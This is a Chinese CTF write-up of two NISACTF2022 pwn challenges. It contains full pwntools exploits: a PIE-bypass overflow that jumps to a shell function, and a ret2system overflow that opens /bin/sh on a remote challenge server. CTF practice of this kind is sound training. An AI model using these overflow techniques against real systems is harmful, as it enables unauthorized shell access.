标签:bin shell elf write sh io pwn main ups
[NISACTF2022]ezpie
- checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
OHHH!,give you a gift!
0x56573770
Input:
- main
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0);
setbuf(stdout, 0);
puts("OHHH!,give you a gift!");
printf("%p\n", main);
puts("Input:");
vuln();
return 0;
}
- vuln
ssize_t vuln()
{
char buf; // [esp+0h] [ebp-28h]
return read(0, &buf, 0x50u);
}
vuln()有溢出
已知程序会输出main地址
程序main函数地址为00000770,则
main_addr = int(io.recvline(),16)
offset = main_addr - main_add
接收程序输出的main函数地址,减去静态地址算出offset
- shell
int shell()
{
return system("/bin/sh");
}
获取shell地址
bin_sh = elf.sym['shell']
加上offset,得bin_sh_final
bin_sh_final = offset + bin_sh
完整exp
from pwn import *
context(os = 'linux' , arch = 'i386' , log_level = 'debug')
content = 0
if content == 0:
io = remote('124.221.24.137',28638)
else:
io = process('')
def atk():
elf = ELF('')
padlength = 0x28 +0x4
bin_sh = elf.sym['shell']
io.recvuntil('OHHH!,give you a gift!\n')
main_addr = int(io.recvline(),16)
success('[+]main_addr=' + hex(main_addr))
main_add = elf.sym['main']
offset = main_addr - main_add
success('[+]offset=' + hex(offset))
io.recvuntil('Input:\n')
success('[+]bin_sh=' + hex(bin_sh))
bin_sh_final = offset + bin_sh
success('[+]bin_sh_final='+hex(bin_sh_final))
payload = b'a' * padlength + p64(bin_sh_final)
io.sendline(payload)
io.interactive()
[NISACTF2022]ezstack
- main
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0);
setbuf(stdout, 0);
shell();
return 0;
}
- shell
ssize_t shell()
{
char buf; // [esp+0h] [ebp-48h]
system("echo Welcome to NISACTF");
return read(0, &buf, 0x60u);
}
shell函数处有溢出
完整exp
from pwn import *
elf = ELF('')
# io = process('')
io = remote('124.221.24.137',28760)
padlength = 0x48 + 0x4
bin_sh = next(elf.search(b'/bin/sh'))
system = elf.sym['system']
success('[+]bin_sh=' + hex(bin_sh))
success('[+]system=' + hex(system))
shell = elf.sym['shell']
success('[+]shell=' + hex(shell))
payload = b'a' * padlength + p32(system) + p32(bin_sh)
io.sendline(payload)
io.interactive()
标签:bin,shell,elf,write,sh,io,pwn,main,ups 来源: https://www.cnblogs.com/M1sceden4/p/16240907.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。